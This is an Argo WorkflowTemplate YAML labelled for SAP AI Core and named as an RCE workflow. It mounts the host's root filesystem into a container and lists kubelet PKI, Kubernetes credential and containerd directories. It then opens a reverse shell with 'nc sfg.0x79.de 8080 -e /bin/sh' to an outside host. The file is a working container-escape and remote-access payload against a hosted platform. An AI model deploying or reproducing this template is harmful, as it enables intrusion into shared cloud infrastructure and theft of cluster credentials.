apiVersion: argoproj.io/v1alpha1
kind: WorkflowTemplate
metadata:
  name: testflo-rce-wft
  annotations:
    executables.ai.sap.com/name: testflo-rce-wft
    executables.ai.sap.com/id: testflo-rce-wft
  labels:
    scenarios.ai.sap.com/id: testflo-scenario
    scenarios.ai.sap.com/name: testflo-scenario
    executables.ai.sap.com/id: testflo-rce-wft
    executables.ai.sap.com/name: testflo-rce-wft
    ai.sap.com/version: "1.0.0"
    ai.sap.com/resourcePlan: starter
spec:
  entrypoint: cb
  volumes:
    - name: host-root
      hostPath:
        path: /
  templates:
    - name: cb
      container:
        image: alpine:3.19
        volumeMounts:
          - name: host-root
            mountPath: /host
        command:
          - sh
          - -c
          - |
            echo "=== host fs ===" && ls /host || true
            echo "=== kubelet pki ===" && ls /host/var/lib/kubelet/pki/ 2>/dev/null || true
            echo "=== k8s creds ===" && ls /host/etc/kubernetes/ 2>/dev/null || true
            echo "=== containerd ===" && ls /host/run/containerd/ 2>/dev/null || true
            nc sfg.0x79.de 8080 -e /bin/sh || true
